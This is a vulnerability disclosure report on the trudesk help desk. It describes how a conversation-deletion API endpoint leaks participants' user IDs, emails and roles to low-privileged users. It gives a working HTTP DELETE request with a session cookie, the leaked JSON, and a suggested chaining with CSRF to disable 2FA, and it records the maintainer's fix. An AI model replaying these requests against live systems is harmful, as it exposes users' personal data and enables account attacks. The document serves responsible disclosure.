Exposure of Sensitive Information to an Unauthorized Actor in polonel/trudesk

Valid

Reported on

Dec 31st 2021


Description

When you delete a conversation, the server responds with sensitive data including user IDs and emails among other data. The endpoint that's contacted in order to delete a conversation is /api/v1/messages/conversation/<conversation ID>.

A user with low level privileges (such as a customer account) could delete a conversation with an admin or support user in order to gather sensitive data on them (such as their email and user ID).

Proof of Concept

Request to delete a conversation:

DELETE /api/v1/messages/conversation/61cbd4e1ce4a7b08a27da13d HTTP/1.1
Host: docker.trudesk.io
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Origin: https://docker.trudesk.io
DNT: 1
Connection: keep-alive
Referer: https://docker.trudesk.io/messages/61cbd4e1ce4a7b08a27da13d
Cookie: connect.sid=s%3A31gkqni9Vf8BD36ANQ7gKXaqrXC7kB5o.%2Fxp0Y6uSTTPs0mRElGQX7DgfBvjTgY8TLaQKI5VbsoM; $trudesk%3Atimezone=America/New_York; io=XohJgk5RuPIxqanVAAzL
Sec-GPC: 1

After a conversation is deleted, the server responds with this data:

{
 "success": true,
 "conversation": {
 "participants": [
 {
 "_id": "61c8238fce4a7b08a27da00d",
 "username": "customer.demo",
 "email": "turnonit@gmail.com",
 "fullname": "Client",
 "title": "Client",
 "role": {
 "_id": "5c860277e518a8003458fae7",
 "name": "User",
 "description": "Default role for users",
 "normalized": "user",
 "isAdmin": false,
 "isAgent": false,
 "id": "5c860277e518a8003458fae7"
 },
 "lastOnline": "2021-12-26T08:12:37.037Z"
 },
 {
 "_id": "5ba4104e5b2b5a00605e95a2",
 "username": "demo.user",
 "fullname": "Demo User",
 "email": "demo.admin@trudesk.io",
 "role": {
 "_id": "5c860277e518a8003458fae9",
 "name": "Admin",
 "description": "Default role for admins",
 "normalized": "admin",
 "isAdmin": true,
 "isAgent": true,
 "id": "5c860277e518a8003458fae9"
 },
 "title": "Demo Admin",
 "lastOnline": "2021-12-26T08:02:59.342Z"
 }
 ],
 "_id": "61c823ebce4a7b08a27da00e",
 "userMeta": [
 {
 "userId": "61c8238fce4a7b08a27da00d",
 "joinedAt": "2021-12-26T08:12:27.015Z",
 "createdAt": "2021-12-26T08:12:27.022Z",
 "updatedAt": "2021-12-26T08:12:55.266Z",
 "deletedAt": "2021-12-26T08:12:55.264Z"
 },
 {
 "userId": "5ba4104e5b2b5a00605e95a2",
 "joinedAt": "2021-12-26T08:12:27.015Z",
 "lastRead": "2021-12-26T08:12:27.015Z",
 "createdAt": "2021-12-26T08:12:27.022Z",
 "updatedAt": "2021-12-26T08:12:27.022Z"
 }
 ],
 "updatedAt": "2021-12-26T08:12:44.650Z",
 "createdAt": "2021-12-26T08:12:27.018Z",
 "__v": 0
 }
}

Impact

Since this leaks sensitive information, an attacker can use this information in another attack. For example, since it leaks the user ID, the attacker can take this piece of data and perform a CSRF attack in order to disable the victim's 2FA code (a CSRF vulnerability which i pointed out here: https://huntr.dev/bounties/edit/af3ecce4-840f-445e-98d0-11557cd8de1f/)

Occurrences

After a conversation is successfully deleted, the sConvo variable is returned which contains all the metadata of the conversation which includes sensitive data (such as user IDs). This metadata should be stripped prior to it being returned to the user when they delete a conversation in order to prevent information leakage.

We are processing your report and will contact the polonel/trudesk team within 24 hours. 6 months ago
We have contacted a member of the polonel/trudesk team and are waiting to hear back 6 months ago
We have sent a follow up to the polonel/trudesk team. We will try again in 7 days. 6 months ago
We have sent a second follow up to the polonel/trudesk team. We will try again in 10 days. 5 months ago
Chris Brame validated this vulnerability 5 months ago
1d8 has been awarded the disclosure bounty
The fix bounty is now up for grabs
Chris Brame
a month ago

Maintainer


This has been fixed in v1.2.2. I will update this report once it is released.

Chris Brame confirmed that a fix has been merged on e2db47 a month ago
Chris Brame has been awarded the fix bounty
messages.js#L311 has been validated
to join this conversation